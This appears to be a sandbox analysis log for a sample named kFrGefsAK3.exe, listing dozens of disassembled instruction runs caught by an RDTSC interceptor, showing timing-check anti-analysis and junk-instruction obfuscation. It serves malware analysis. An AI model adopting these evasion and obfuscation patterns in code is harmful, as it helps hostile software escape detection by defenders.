Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75709E7 second address: 7570A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+20h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA278C27B7Bh 0x00000015 xor esi, 0882B36Eh 0x0000001b jmp 00007FA278C27B89h 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esi+40h], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007FA278C27B7Ah 0x0000002e and esi, 66BA66E8h 0x00000034 jmp 00007FA278C27B7Bh 0x00000039 popfd 0x0000003a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570A4C second address: 7570A9B instructions: 0x00000000 rdtsc 0x00000002 mov cx, 8EDFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov bx, si 0x0000000b popad 0x0000000c lea eax, dword ptr [ebx+00000080h] 0x00000012 jmp 00007FA278C0D01Eh 0x00000017 push 00000001h 0x00000019 pushad 0x0000001a push eax 0x0000001b pushfd 0x0000001c jmp 00007FA278C0D01Dh 0x00000021 adc cl, FFFFFFB6h 0x00000024 jmp 00007FA278C0D021h 0x00000029 popfd 0x0000002a pop esi 0x0000002b push eax 0x0000002c push edx 0x0000002d mov edx, 0DFC3AF2h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570A9B second address: 7570B03 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA278C27B83h 0x00000008 adc al, FFFFFFEEh 0x0000000b jmp 00007FA278C27B89h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 nop 0x00000015 jmp 00007FA278C27B7Eh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 pushfd 0x00000021 jmp 00007FA278C27B7Ah 0x00000026 or cx, 2398h 0x0000002b jmp 00007FA278C27B7Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570B03 second address: 7570BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FA278C0D01Eh 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 jmp 00007FA278C0D020h 0x00000017 nop 0x00000018 jmp 00007FA278C0D020h 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FA278C0D021h 0x00000025 adc eax, 32CC13F6h 0x0000002b jmp 00007FA278C0D021h 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007FA278C0D020h 0x00000037 sub eax, 081FED18h 0x0000003d jmp 00007FA278C0D01Bh 0x00000042 popfd 0x00000043 popad 0x00000044 nop 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FA278C0D025h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570BBB second address: 7570BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570BC1 second address: 7570BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570C27 second address: 7570C52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FA2E88765F5h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570C52 second address: 7570C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C0D021h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570C67 second address: 7570C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA278C27B88h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570C8C second address: 7570CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA278C0D021h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FA278C0D021h 0x0000000f jmp 00007FA278C0D01Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esi+04h], eax 0x0000001b jmp 00007FA278C0D026h 0x00000020 lea eax, dword ptr [ebx+78h] 0x00000023 jmp 00007FA278C0D020h 0x00000028 push 00000001h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570CF6 second address: 7570CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570CFA second address: 7570D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570D00 second address: 7570D33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FA278C27B80h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov al, 9Fh 0x00000015 mov ax, di 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570D33 second address: 7570D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570D39 second address: 7570D65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA278C27B87h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570D65 second address: 7570D9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-08h] 0x0000000e jmp 00007FA278C0D01Ch 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FA278C0D029h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570D9D second address: 7570DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570DAD second address: 7570DE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FA278C0D029h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA278C0D01Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570DE8 second address: 7570DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570E02 second address: 7570E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570E06 second address: 7570E0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570E0C second address: 7570E8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007FA278C0D026h 0x00000010 test edi, edi 0x00000012 jmp 00007FA278C0D020h 0x00000017 js 00007FA2E885B882h 0x0000001d pushad 0x0000001e mov dl, cl 0x00000020 mov ecx, ebx 0x00000022 popad 0x00000023 mov eax, dword ptr [ebp-04h] 0x00000026 jmp 00007FA278C0D025h 0x0000002b mov dword ptr [esi+08h], eax 0x0000002e jmp 00007FA278C0D01Eh 0x00000033 lea eax, dword ptr [ebx+70h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570E8B second address: 7570E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570E8F second address: 7570EAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570EAC second address: 7570EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570EB2 second address: 7570EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570EB6 second address: 7570F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA278C27B85h 0x00000011 add al, FFFFFF96h 0x00000014 jmp 00007FA278C27B81h 0x00000019 popfd 0x0000001a mov esi, 3187F807h 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FA278C27B89h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7570F0E second address: 7570F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757106C second address: 7571116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA278C27B7Bh 0x00000009 or eax, 7E53828Eh 0x0000000f jmp 00007FA278C27B89h 0x00000014 popfd 0x00000015 mov cx, 0197h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ecx, esi 0x0000001e pushad 0x0000001f mov dl, 8Ch 0x00000021 popad 0x00000022 mov dword ptr [esi+0Ch], eax 0x00000025 jmp 00007FA278C27B7Eh 0x0000002a mov edx, 772406ECh 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FA278C27B7Eh 0x00000036 and ecx, 4423EF68h 0x0000003c jmp 00007FA278C27B7Bh 0x00000041 popfd 0x00000042 mov bl, ah 0x00000044 popad 0x00000045 mov eax, 00000000h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007FA278C27B7Dh 0x00000053 sbb eax, 5D3C6186h 0x00000059 jmp 00007FA278C27B81h 0x0000005e popfd 0x0000005f mov si, 9337h 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571116 second address: 75711A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f mov esi, 487B7B79h 0x00000014 pushfd 0x00000015 jmp 00007FA278C0D026h 0x0000001a adc eax, 0CDBF688h 0x00000020 jmp 00007FA278C0D01Bh 0x00000025 popfd 0x00000026 popad 0x00000027 call 00007FA278C0D028h 0x0000002c mov ecx, 03BDBB01h 0x00000031 pop esi 0x00000032 popad 0x00000033 pop edi 0x00000034 jmp 00007FA278C0D01Dh 0x00000039 test eax, eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jmp 00007FA278C0D023h 0x00000043 mov dl, ah 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75711A4 second address: 7571272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FA2E8876098h 0x0000000f pushad 0x00000010 mov esi, 198EB7FDh 0x00000015 call 00007FA278C27B7Ah 0x0000001a pushfd 0x0000001b jmp 00007FA278C27B82h 0x00000020 sub si, A008h 0x00000025 jmp 00007FA278C27B7Bh 0x0000002a popfd 0x0000002b pop eax 0x0000002c popad 0x0000002d mov edx, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 mov dl, 1Bh 0x00000033 pushfd 0x00000034 jmp 00007FA278C27B7Eh 0x00000039 sbb ecx, 6B51C268h 0x0000003f jmp 00007FA278C27B7Bh 0x00000044 popfd 0x00000045 popad 0x00000046 mov eax, dword ptr [esi] 0x00000048 jmp 00007FA278C27B86h 0x0000004d mov dword ptr [edx], eax 0x0000004f jmp 00007FA278C27B80h 0x00000054 mov eax, dword ptr [esi+04h] 0x00000057 pushad 0x00000058 mov si, 150Dh 0x0000005c mov edx, ecx 0x0000005e popad 0x0000005f mov dword ptr [edx+04h], eax 0x00000062 jmp 00007FA278C27B84h 0x00000067 mov eax, dword ptr [esi+08h] 0x0000006a push eax 0x0000006b push edx 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571272 second address: 7571279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571279 second address: 757127F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757127F second address: 75712A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+08h], eax 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f mov ecx, edx 0x00000011 popad 0x00000012 mov eax, dword ptr [esi+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA278C0D01Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75712A0 second address: 75712E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FA278C27B81h 0x00000017 adc esi, 07C97206h 0x0000001d jmp 00007FA278C27B81h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75712E2 second address: 7571345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA278C0D027h 0x00000009 adc si, 813Eh 0x0000000e jmp 00007FA278C0D029h 0x00000013 popfd 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+10h] 0x0000001d pushad 0x0000001e mov bh, C9h 0x00000020 mov cx, EE11h 0x00000024 popad 0x00000025 mov dword ptr [edx+10h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FA278C0D023h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571345 second address: 757137B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c jmp 00007FA278C27B7Eh 0x00000011 mov dword ptr [edx+14h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov dl, al 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757137B second address: 75713CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esi+18h] 0x00000008 jmp 00007FA278C0D01Eh 0x0000000d mov dword ptr [edx+18h], eax 0x00000010 jmp 00007FA278C0D020h 0x00000015 mov eax, dword ptr [esi+1Ch] 0x00000018 jmp 00007FA278C0D020h 0x0000001d mov dword ptr [edx+1Ch], eax 0x00000020 pushad 0x00000021 jmp 00007FA278C0D01Eh 0x00000026 push eax 0x00000027 push edx 0x00000028 mov si, C1E7h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75713CF second address: 75713FB instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+20h] 0x0000000b pushad 0x0000000c mov dl, F2h 0x0000000e call 00007FA278C27B7Eh 0x00000013 mov eax, 2C117BE1h 0x00000018 pop esi 0x00000019 popad 0x0000001a mov dword ptr [edx+20h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75713FB second address: 75713FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75713FF second address: 7571405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571405 second address: 7571469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007FA278C0D01Eh 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 call 00007FA278C0D01Dh 0x0000001c pop eax 0x0000001d pushfd 0x0000001e jmp 00007FA278C0D021h 0x00000023 add cx, 8676h 0x00000028 jmp 00007FA278C0D021h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571469 second address: 7571527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007FA278C27B83h 0x0000000c sub ax, ABAEh 0x00000011 jmp 00007FA278C27B89h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+28h] 0x0000001d jmp 00007FA278C27B7Eh 0x00000022 mov dword ptr [edx+28h], eax 0x00000025 pushad 0x00000026 push esi 0x00000027 push edx 0x00000028 pop ecx 0x00000029 pop ebx 0x0000002a pushfd 0x0000002b jmp 00007FA278C27B86h 0x00000030 and ch, FFFFFF88h 0x00000033 jmp 00007FA278C27B7Bh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ecx, dword ptr [esi+2Ch] 0x0000003d pushad 0x0000003e mov edi, eax 0x00000040 mov si, 1BF7h 0x00000044 popad 0x00000045 mov dword ptr [edx+2Ch], ecx 0x00000048 pushad 0x00000049 pushad 0x0000004a mov cx, 2085h 0x0000004e jmp 00007FA278C27B82h 0x00000053 popad 0x00000054 movzx esi, bx 0x00000057 popad 0x00000058 mov ax, word ptr [esi+30h] 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FA278C27B7Fh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571527 second address: 7571544 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571544 second address: 757156C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA278C27B7Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 757156C second address: 7571572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571572 second address: 7571576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571576 second address: 75715FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA278C0D01Bh 0x00000014 jmp 00007FA278C0D023h 0x00000019 popfd 0x0000001a mov eax, 59A11D5Fh 0x0000001f popad 0x00000020 mov dx, cx 0x00000023 popad 0x00000024 mov word ptr [edx+32h], ax 0x00000028 pushad 0x00000029 pushad 0x0000002a push esi 0x0000002b pop ebx 0x0000002c movzx ecx, di 0x0000002f popad 0x00000030 pushfd 0x00000031 jmp 00007FA278C0D01Bh 0x00000036 sub ah, 0000005Eh 0x00000039 jmp 00007FA278C0D029h 0x0000003e popfd 0x0000003f popad 0x00000040 mov eax, dword ptr [esi+34h] 0x00000043 jmp 00007FA278C0D01Eh 0x00000048 mov dword ptr [edx+34h], eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e mov si, bx 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75715FF second address: 7571650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 7FC7FF34h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test ecx, 00000700h 0x00000013 pushad 0x00000014 mov cx, bx 0x00000017 movsx edx, ax 0x0000001a popad 0x0000001b jne 00007FA2E8875C73h 0x00000021 jmp 00007FA278C27B7Ch 0x00000026 or dword ptr [edx+38h], FFFFFFFFh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov eax, ebx 0x0000002f call 00007FA278C27B89h 0x00000034 pop esi 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7571650 second address: 75716BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA278C0D01Ch 0x00000009 add ecx, 1FD08278h 0x0000000f jmp 00007FA278C0D01Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FA278C0D028h 0x0000001b sbb eax, 4FFE9CD8h 0x00000021 jmp 00007FA278C0D01Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a or dword ptr [edx+3Ch], FFFFFFFFh 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FA278C0D025h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75716BB second address: 75716C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75716C0 second address: 7571746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or dword ptr [edx+40h], FFFFFFFFh 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA278C0D024h 0x00000012 adc ax, E198h 0x00000017 jmp 00007FA278C0D01Bh 0x0000001c popfd 0x0000001d movzx esi, di 0x00000020 popad 0x00000021 pop esi 0x00000022 jmp 00007FA278C0D01Bh 0x00000027 pop ebx 0x00000028 pushad 0x00000029 call 00007FA278C0D024h 0x0000002e call 00007FA278C0D022h 0x00000033 pop esi 0x00000034 pop edx 0x00000035 mov edi, esi 0x00000037 popad 0x00000038 leave 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c call 00007FA278C0D01Fh 0x00000041 pop esi 0x00000042 mov cl, dh 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75C0C11 second address: 75C0C37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e movsx edx, cx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov bx, ABF2h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 75C0C37 second address: 75C0C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 call 00007FA278C0D01Fh 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7560758 second address: 7560788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1C4559EEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FA278C27B81h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA278C27B7Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7560788 second address: 75607B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FA278C0D023h 0x00000012 pop ecx 0x00000013 mov ecx, edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 7500686 second address: 7500696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B7Ch 0x00000009 rdtsc
